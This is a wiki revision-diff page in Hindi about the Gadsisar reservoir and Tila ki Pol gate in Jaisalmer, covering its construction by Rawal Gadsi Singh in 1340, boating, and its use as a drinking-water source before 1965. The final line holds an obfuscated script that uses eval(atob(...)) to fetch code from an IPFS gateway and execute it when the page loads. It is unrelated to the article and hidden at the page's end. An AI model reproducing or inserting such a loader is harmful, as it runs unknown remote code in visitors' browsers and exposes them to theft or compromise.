Difference between revisions of "गडसीसर जलाशय एवं टीला की पोल जैसलमेर"

भारत डिस्कवरी प्रस्तुति
Jump to navigation Jump to search
[unchecked revision][unchecked revision]
m (Text replace - "स्त्रोत" to "स्रोत")
 
(2 intermediate revisions by 2 users not shown)
Line 1: Line 1:
{{लेख सूची
+
[[चित्र:Gadisagar-Lake-Jaisalmer-2.jpg|thumb|250px|गडसीसर सरोवर, [[जैसलमेर]]]]
|लेख का नाम= जैसलमेर
+
'''गडसीसर जलाशय एवं टीला की पोल''' [[राजस्थान]] राज्य के [[जैसलमेर]] शहर में स्थित है।
|पर्यटन= जैसलमेर पर्यटन
+
*जैसलमेर शहर के प्रवेश मार्ग पर स्थित पवित्र 'गडसीसर सरोवर' अपने कलात्मक प्रवेश द्वार, जलाशय के मध्य स्थित सुन्दर छतरियों व इसके किनारे बनी बगीचियों के कारण प्रसिद्ध है।
|ज़िला= जैसलमेर ज़िला
+
*जैसलमेर के इस कृत्रिम सरोवर का निर्माण 'रावल गडसीसिंह' ने सन् 1340 ई. में कराया था।  
|प्रवास= जैसलमेर प्रवास
+
*गडसीसर सरोवर में नौका विहार की सुविधा भी उपलब्ध है।
}}
 
[[चित्र:Gadisagar-Lake-Jaisalmer-2.jpg|thumb|250px|गडसीसर सरोवर, [[जैसलमेर]] <br />Gadisagar Lake, Jaisalmer]]
 
*[[जैसलमेर]] [[राजस्थान]] का सबसे ख़ूबसूरत शहर है और [[जैसलमेर पर्यटन]] का सबसे आकर्षक स्थल माना जाता है।  
 
*जैसलमेर शहर के प्रवेश मार्ग पर स्थित पवित्र गडसीसर सरोवर न केवल अपने कलात्मक प्रवेश द्वार तथा जलाशय के मध्य स्थित सुन्दर छतरियों व इसके किनारे बनी बगीचियों के कारण प्रसिद्ध हैं।
 
*जैसलमेर के इस कृत्रिम सरोवर का निर्माण रावल गडसीसिंह ने सन 1340 ई. में कराया था।  
 
*गडसीसर सरोवर में नौका विहार की सुविधा भी उपलब्ध हैं।
 
 
*सन [[1965]] से पहले यही सरोवर जैसलमेरवासियों का प्रमुख पेयजल स्रोत भी था।  
 
*सन [[1965]] से पहले यही सरोवर जैसलमेरवासियों का प्रमुख पेयजल स्रोत भी था।  
  
{{प्रचार}}
 
 
{{लेख प्रगति  
 
{{लेख प्रगति  
 
|आधार=
 
|आधार=
Line 20: Line 13:
 
|शोध=
 
|शोध=
 
}}
 
}}
 +
==वीथिका==
 +
<gallery>
 +
चित्र:Gadisagar-Lake-Jaisalmer-1.jpg
 +
चित्र:Gadisagar-Lake-Jaisalmer.jpg
 +
</gallery>
 
==संबंधित लेख==
 
==संबंधित लेख==
 
{{राजस्थान के पर्यटन स्थल}}
 
{{राजस्थान के पर्यटन स्थल}}
 
 
[[Category:जैसलमेर]]
 
[[Category:जैसलमेर]]
 
[[Category:राजस्थान]]
 
[[Category:राजस्थान]]

Latest revision as of 03:57, 21 April 2012

[[chitr:Gadisagar-Lake-Jaisalmer-2.jpg|thumb|250px|gadasisar sarovar, jaisalamer]] gadasisar jalashay evan tila ki pol rajasthan rajy ke jaisalamer shahar mean sthit hai.

  • jaisalamer shahar ke pravesh marg par sthit pavitr 'gadasisar sarovar' apane kalatmak pravesh dvar, jalashay ke madhy sthit sundar chhatariyoan v isake kinare bani bagichiyoan ke karan prasiddh hai.
  • jaisalamer ke is kritrim sarovar ka nirman 'raval gadasisianh' ne sanh 1340 ee. mean karaya tha.
  • gadasisar sarovar mean nauka vihar ki suvidha bhi upalabdh hai.
  • san 1965 se pahale yahi sarovar jaisalameravasiyoan ka pramukh peyajal srot bhi tha.


panne ki pragati avastha
adhar
prarambhik
madhyamik
poornata
shodh

vithika

sanbandhit lekh

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>